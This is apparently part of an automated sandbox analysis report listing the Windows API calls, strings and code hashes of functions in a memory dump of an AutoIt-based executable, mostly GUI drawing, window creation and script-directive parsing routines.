Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 3cc364695e5f1e477642375573482450ffa88a965bc97eb98ec562cf6b01f739
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: FAC1BF722052938ADF2D463A84344BFFFA15AA27B131E4B6DD4B3CB4C1EE24E524C670

Function 00DEA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00DEA7A5
DeleteObject.GDI32(00000000), ref: 00DEA7B7
DestroyWindow.USER32 ref: 00DEA7C5
GetDesktopWindow.USER32 ref: 00DEA7DF
GetWindowRect.USER32(00000000), ref: 00DEA7E6
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00DEA927
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00DEA937
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEA97F
GetClientRect.USER32(00000000,?), ref: 00DEA98B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DEA9C5
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEA9E7
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEA9FA
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEAA05
GlobalLock.KERNEL32(00000000), ref: 00DEAA0E
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEAA1D
GlobalUnlock.KERNEL32(00000000), ref: 00DEAA26
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEAA2D
GlobalFree.KERNEL32(00000000), ref: 00DEAA38
CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00DEAA4A
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00E1D9BC,00000000), ref: 00DEAA60
GlobalFree.KERNEL32(00000000), ref: 00DEAA70
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00DEAA96
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00DEAAB5
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEAAD7
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEACC4

Strings

AutoIt v3, xrefs: 00DEA977
, xrefs: 00DEAC4A
DISPLAY, xrefs: 00DEAB27
static, xrefs: 00DEA9BF, 00DEAB16

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 6895df9d4b40d9f0aa36666fd889d7177bde8eef64467ac79db40b36b1a82b7d
Instruction ID: 7d56556f3b3db4426093e3b997d3b9f83ba494f8361e7ea2503b32502711ad83
Opcode Fuzzy Hash: 6895df9d4b40d9f0aa36666fd889d7177bde8eef64467ac79db40b36b1a82b7d
Instruction Fuzzy Hash: A2029D71A00255EFDB14EF6ACC89EAE7BB9EF48310F148159F915AB2A0C730AD45CB70

Function 00DFD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00DFD0EB
GetSysColorBrush.USER32(0000000F), ref: 00DFD11C
GetSysColor.USER32(0000000F), ref: 00DFD128
SetBkColor.GDI32(?,000000FF), ref: 00DFD142
SelectObject.GDI32(?,00000000), ref: 00DFD151
InflateRect.USER32(?,000000FF,000000FF), ref: 00DFD17C
GetSysColor.USER32(00000010), ref: 00DFD184
CreateSolidBrush.GDI32(00000000), ref: 00DFD18B
FrameRect.USER32(?,?,00000000), ref: 00DFD19A
DeleteObject.GDI32(00000000), ref: 00DFD1A1
InflateRect.USER32(?,000000FE,000000FE), ref: 00DFD1EC
FillRect.USER32(?,?,00000000), ref: 00DFD21E
GetWindowLongW.USER32(?,000000F0), ref: 00DFD249

Part of subcall function 00DFD385: GetSysColor.USER32(00000012), ref: 00DFD3BE
Part of subcall function 00DFD385: SetTextColor.GDI32(?,?), ref: 00DFD3C2
Part of subcall function 00DFD385: GetSysColorBrush.USER32(0000000F), ref: 00DFD3D8
Part of subcall function 00DFD385: GetSysColor.USER32(0000000F), ref: 00DFD3E3
Part of subcall function 00DFD385: GetSysColor.USER32(00000011), ref: 00DFD400
Part of subcall function 00DFD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DFD40E
Part of subcall function 00DFD385: SelectObject.GDI32(?,00000000), ref: 00DFD41F
Part of subcall function 00DFD385: SetBkColor.GDI32(?,00000000), ref: 00DFD428
Part of subcall function 00DFD385: SelectObject.GDI32(?,?), ref: 00DFD435
Part of subcall function 00DFD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00DFD454
Part of subcall function 00DFD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DFD46B
Part of subcall function 00DFD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00DFD480
Part of subcall function 00DFD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DFD4A8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 98312e89c80947af6585def2f3030b12e2bf3c81d66cf1ebd7b331e5cdc82772
Instruction ID: 857219437f53be571c7c8facc67fab8e69a746f8721c36da0b904d8035aa7d39
Opcode Fuzzy Hash: 98312e89c80947af6585def2f3030b12e2bf3c81d66cf1ebd7b331e5cdc82772
Instruction Fuzzy Hash: E6918071009305FFC7119F65DC08EAB7BAAFF85320F148A19F662A61E0D775D948CB61

Function 00DEA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00DEA42A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DEA4E9
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00DEA527
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00DEA539
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00DEA57F
GetClientRect.USER32(00000000,?), ref: 00DEA58B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00DEA5CF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DEA5DE
GetStockObject.GDI32(00000011), ref: 00DEA5EE
SelectObject.GDI32(00000000,00000000), ref: 00DEA5F2
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00DEA602
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DEA60B
DeleteDC.GDI32(00000000), ref: 00DEA614
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DEA642
SendMessageW.USER32(00000030,00000000,00000001), ref: 00DEA659
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00DEA694
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DEA6A8
SendMessageW.USER32(00000404,00000001,00000000), ref: 00DEA6B9
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00DEA6E9
GetStockObject.GDI32(00000011), ref: 00DEA6F4
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DEA6FF
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00DEA709

Strings

AutoIt v3, xrefs: 00DEA577
DISPLAY, xrefs: 00DEA5D4
static, xrefs: 00DEA5C9, 00DEA6E3
msctls_progress32, xrefs: 00DEA68A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: b648aadde344e1f462f0aa576cd818ca28b0def85b422bb95f7b600973217df0
Instruction ID: 60860a77397af24210509ef4d7a9ea353f19ae2bcd9544868bdb2c00df6b53ff
Opcode Fuzzy Hash: b648aadde344e1f462f0aa576cd818ca28b0def85b422bb95f7b600973217df0
Instruction Fuzzy Hash: EAA14C71A40215BFEB14DFAADC4AFAE7BB9EB04711F008154F614BB2E0D6B0AD04CB60

Function 00DDE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DDE45E
GetDriveTypeW.KERNEL32(?,00E2DC88,?,\\.\,00E2DBF0), ref: 00DDE54B
SetErrorMode.KERNEL32(00000000,00E2DC88,?,\\.\,00E2DBF0), ref: 00DDE6B1

Strings

SATA, xrefs: 00DDE661
Fibre, xrefs: 00DDE63E
USB, xrefs: 00DDE645
Network, xrefs: 00DDE589
Virtual, xrefs: 00DDE676
SCSI, xrefs: 00DDE61B
RAID, xrefs: 00DDE64C
FileBackedVirtual, xrefs: 00DDE67D
ATA, xrefs: 00DDE629
MMC, xrefs: 00DDE66F
Removable, xrefs: 00DDE59D
Fixed, xrefs: 00DDE593
SAS, xrefs: 00DDE65A
1394, xrefs: 00DDE630
RAMDisk, xrefs: 00DDE575
iSCSI, xrefs: 00DDE653
SSD, xrefs: 00DDE5D8
\\.\, xrefs: 00DDE4B3
Unknown, xrefs: 00DDE56B, 00DDE614
CDROM, xrefs: 00DDE57F
PhysicalDrive, xrefs: 00DDE4EF
ATAPI, xrefs: 00DDE622
SSA, xrefs: 00DDE637

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: d2ecd7873401b3349c440711bfc5358b546a9d84934efeeac7f2dab025a324d0
Instruction ID: a5978dd5aa2fde188ca6367ebb7fbe73461f12b498dd4a8593cce39216463d95
Opcode Fuzzy Hash: d2ecd7873401b3349c440711bfc5358b546a9d84934efeeac7f2dab025a324d0
Instruction Fuzzy Hash: 0D517030248301ABC710FF24E8D1929B7A1EBA4744B659E1BF486BF3D1DA60DE45DB72

Function 00D9C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D9C741
__wcsnicmp.LIBCMT ref: 00D9C759
__wcsnicmp.LIBCMT ref: 00D9C771
__wcsnicmp.LIBCMT ref: 00D9C789
__wcsnicmp.LIBCMT ref: 00D9C7A1
__wcsnicmp.LIBCMT ref: 00D9C7B5
__wcsnicmp.LIBCMT ref: 00D9C7C9
__wcsnicmp.LIBCMT ref: 00D9C7E1
__wcsnicmp.LIBCMT ref: 00D9C8B2
__wcsnicmp.LIBCMT ref: 00D9C8C6
__wcsnicmp.LIBCMT ref: 00D9C8DA
__wcsnicmp.LIBCMT ref: 00D9C8EE

Strings

#include-once, xrefs: 00D9C79B
#pragma compile, xrefs: 00D9C73B
#notrayicon, xrefs: 00D9C753
Bad directive syntax error, xrefs: 00E0346D
#OnAutoItStartRegister, xrefs: 00D9C783
Unterminated group of comments, xrefs: 00E03475
#include, xrefs: 00D9C7AF
#cs, xrefs: 00D9C7DB, 00D9C8C0
Cannot parse #include, xrefs: 00E03482
#ce, xrefs: 00D9C8E8
#requireadmin, xrefs: 00D9C76B
#comments-start, xrefs: 00D9C7C3, 00D9C8AC
#comments-end, xrefs: 00D9C8D4

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 501af739a5c5c3996455e4db175e0028ec861b02f9f3af557bebe03ed3468749
Instruction ID: c7fb9105e9bdc87f48ac43d4189d09bc22c084a18ac5de865ca563c31759f167
Opcode Fuzzy Hash: 501af739a5c5c3996455e4db175e0028ec861b02f9f3af557bebe03ed3468749
Instruction Fuzzy Hash: FB61F671744312BBDF21AA74AC82FBA3398EF15740F142025F956BA5C6EBA0DA41C6B1

Function 00D948C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00D94956
DeleteObject.GDI32(00000000), ref: 00D94998
DeleteObject.GDI32(00000000), ref: 00D949A3
DestroyCursor.USER32(00000000), ref: 00D949AE
DestroyWindow.USER32(00000000), ref: 00D949B9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00E0E179
6FAA0200.COMCTL32(?,000000FF,?), ref: 00E0E1B2
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00E0E5E0

Part of subcall function 00D949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D94954,00000000), ref: 00D94A23

SendMessageW.USER32 ref: 00E0E627
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E0E63E

Strings

0, xrefs: 00E0E474

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
String ID: 0
API String ID: 377055139-4108050209
Opcode ID: f2a91b811eac25838ac673508098c08871d4bf1a2874395346372a4e113b9e0d
Instruction ID: 5c6049a1083373ddcccef2ba65cde809f0628b4938f25ae73f46aea1c4dd01b0
Opcode Fuzzy Hash: f2a91b811eac25838ac673508098c08871d4bf1a2874395346372a4e113b9e0d
Instruction Fuzzy Hash: 24127030504201EFDB25CF14C984BA6BBE5FF45308F545979E999EB2A2C731E886CFA1

Function 00DFC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00DFC598
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00DFC64E
SendMessageW.USER32(?,00001102,00000002,?), ref: 00DFC669
SendMessageW.USER32(?,000000F1,?,00000000), ref: 00DFC925

Strings

0, xrefs: 00DFC6AC

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 4c76174a880f39994d939d34aaf904e34d6758846a82c10b5ed2b284dfe312b4
Instruction ID: 9bf53d2e49be153c0fc9c23eb3ecd3279dc7efa4b57aab52c4bea0821b1c7d6d
Opcode Fuzzy Hash: 4c76174a880f39994d939d34aaf904e34d6758846a82c10b5ed2b284dfe312b4
Instruction Fuzzy Hash: 84F1127111834CAFE7208F24CD84BBABBE4FF45354F099A18F698E62A0C770D864CB61

Function 00DF6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00E2DBF0), ref: 00DF6245

Strings

ISENABLED, xrefs: 00DF6288
EDITPASTE, xrefs: 00DF6557
UNCHECK, xrefs: 00DF649D
GETCURRENTSELECTION, xrefs: 00DF63FF
ADDSTRING, xrefs: 00DF6332
SELECTSTRING, xrefs: 00DF6422
GETSELECTED, xrefs: 00DF64BD
SHOWDROPDOWN, xrefs: 00DF62FC
SENDCOMMANDID, xrefs: 00DF65C6
GETCURRENTLINE, xrefs: 00DF6500
TABRIGHT, xrefs: 00DF62B9
HIDEDROPDOWN, xrefs: 00DF631C
ISVISIBLE, xrefs: 00DF6251
GETLINECOUNT, xrefs: 00DF64E0
DELSTRING, xrefs: 00DF6365
SETCURRENTSELECTION, xrefs: 00DF63D2
GETLINE, xrefs: 00DF6587
ISCHECKED, xrefs: 00DF6455
TABLEFT, xrefs: 00DF62A3
FINDSTRING, xrefs: 00DF6392
CURRENTTAB, xrefs: 00DF62D9
CHECK, xrefs: 00DF6487
GETCURRENTCOL, xrefs: 00DF6520

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: aa9ce3a2bc642f35d1848257d556c03640876f66aa92351c95493cf465bc0d03
Instruction ID: 91d4f49997ba8cf52863546f829a5294b968d2668707acb03e6e8381cbca30fa
Opcode Fuzzy Hash: aa9ce3a2bc642f35d1848257d556c03640876f66aa92351c95493cf465bc0d03
Instruction Fuzzy Hash: D0C192702042059BCB04EF64C451B7E77D6EF95394F09886DF9866B796CB20DD0ACBB2

Function 00DFD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00DFD3BE
SetTextColor.GDI32(?,?), ref: 00DFD3C2
GetSysColorBrush.USER32(0000000F), ref: 00DFD3D8
GetSysColor.USER32(0000000F), ref: 00DFD3E3
CreateSolidBrush.GDI32(?), ref: 00DFD3E8
GetSysColor.USER32(00000011), ref: 00DFD400
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DFD40E
SelectObject.GDI32(?,00000000), ref: 00DFD41F
SetBkColor.GDI32(?,00000000), ref: 00DFD428
SelectObject.GDI32(?,?), ref: 00DFD435
InflateRect.USER32(?,000000FF,000000FF), ref: 00DFD454
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DFD46B
GetWindowLongW.USER32(00000000,000000F0), ref: 00DFD480
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DFD4A8
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DFD4CF
InflateRect.USER32(?,000000FD,000000FD), ref: 00DFD4ED
DrawFocusRect.USER32(?,?), ref: 00DFD4F8
GetSysColor.USER32(00000011), ref: 00DFD506
SetTextColor.GDI32(?,00000000), ref: 00DFD50E
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00DFD522
SelectObject.GDI32(?,00DFD0B5), ref: 00DFD539
DeleteObject.GDI32(?), ref: 00DFD544
SelectObject.GDI32(?,?), ref: 00DFD54A
DeleteObject.GDI32(?), ref: 00DFD54F
SetTextColor.GDI32(?,?), ref: 00DFD555
SetBkColor.GDI32(?,?), ref: 00DFD55F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: c9f3bf7efe4d1e199f197cbc7692e0422bd392a4606961239ac853cda04d776d
Instruction ID: a04b68edd95fa47246cfc8e96ee92037f4b4cad85c26219373bb7bb004bef041
Opcode Fuzzy Hash: c9f3bf7efe4d1e199f197cbc7692e0422bd392a4606961239ac853cda04d776d
Instruction Fuzzy Hash: 36516B71905218FFDB109FA9DC48EEE7BBAEB08320F158115FA11BB2A0D77599408B60

Function 00DFB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DFB5C0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DFB5D1
CharNextW.USER32(0000014E), ref: 00DFB600
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DFB641
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DFB657
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DFB668
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00DFB685
SetWindowTextW.USER32(?,0000014E), ref: 00DFB6D7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00DFB6ED
SendMessageW.USER32(?,00001002,00000000,?), ref: 00DFB71E
